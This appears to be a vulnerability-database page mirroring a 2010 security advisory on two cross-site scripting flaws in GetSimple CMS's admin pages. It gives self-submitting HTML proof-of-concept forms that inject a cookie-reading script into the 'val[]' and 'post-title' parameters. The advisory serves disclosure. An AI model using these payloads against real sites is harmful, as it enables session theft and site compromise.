Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22375
HistoryMay 10, 2010 - 12:00 a.m.

Multiple Cross-site Scripting Vulnerabilities in GetSimple CMS

2010-05-1000:00:00
High-Tech Bridge
www.htbridge.com
27

0.007 Low

EPSS

Percentile

79.9%

JSON

High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in GetSimple CMS which could be exploited to perform cross-site scripting attacks.

  1. Cross-site scripting vulnerability in GetSimple CMS: CVE-2010-5052
    The vulnerability exists due to input sanitation error in the “val[]” parameter in /admin/components.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation example:
    <form action=“http://host/admin/components.php” method=“post” name=“main” accept-charset=“utf-8” >
    <input type=“hidden” name=“submitted” value=“Save Components” />
    <input name=“val[]” type=“hidden” value=‘Some text here…"><script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“slug[]” value=“sidebar” />
    <input type=“hidden” name=“title[]” value=“Sidebar” />
    <input type=“hidden” name=“id[]” value=“0” />
    <input type=“hidden” name=“val[]” value=“Just Another GetSimple Website” />
    <input type=“hidden” name=“slug[]” value=“tagline” />
    <input type=“hidden” name=“title[]” value=“Tagline” />
    <input type=“hidden” name=“id[]” value=“1” />
    </form>
    <script>
    document.main.submit();
    </script>

  2. Cross-site scripting vulnerability in GetSimple CMS: CVE-2010-4863
    The vulnerability exists due to input sanitation error in the “post-title” parameter in /admin/changedata.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation example:
    <form action=“http://host/admin/changedata.php” method=“post” name=“main” >
    <input type=“hidden” name=“post-title” value=‘page title"><script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“post-id” value=“test” />
    <input type=“hidden” name=“post-metak” value=“” />
    <input type=“hidden” name=“post-metad” value=“” />
    <input type=“hidden” name=“post-parent” value=“” />
    <input type=“hidden” name=“post-template” value=“template.php” />
    <input type=“hidden” name=“post-menu” value=“test” />
    <input type=“hidden” name=“post-menu-order” value=“” />
    <input type=“hidden” name=“post-content” value=“page html” />
    <input type=“hidden” name=“existing-url” value=“test” />
    <input type=“hidden” name=“submitted” value=“Save Updates” />
    </form>
    <script>
    document.main.submit();
    </script>

CPENameOperatorVersion
getsimple cmsle2.01

Related

openvas 1
cve 2
prion 2
cvelist 2
nvd 2
openvas
openvas
GetSimple CMS < 2.03 Multiple Vulnerabilities
2010-07-26 00:00:00
cve
cve
CVE-2010-5052
2011-11-23 01:55:04
CVE-2010-4863
2011-10-05 10:55:07
prion
prion
Cross site scripting
2011-11-23 01:55:00
Cross site scripting
2011-10-05 10:55:00
cvelist
cvelist
CVE-2010-5052
2011-11-23 01:00:00
CVE-2010-4863
2011-10-05 10:00:00
nvd
nvd
CVE-2010-5052
2011-11-23 01:55:04
CVE-2010-4863
2011-10-05 10:55:07

0.007 Low

EPSS

Percentile

79.9%

JSON
Related for HTB22375
openvas1cve2prion2cvelist2nvd2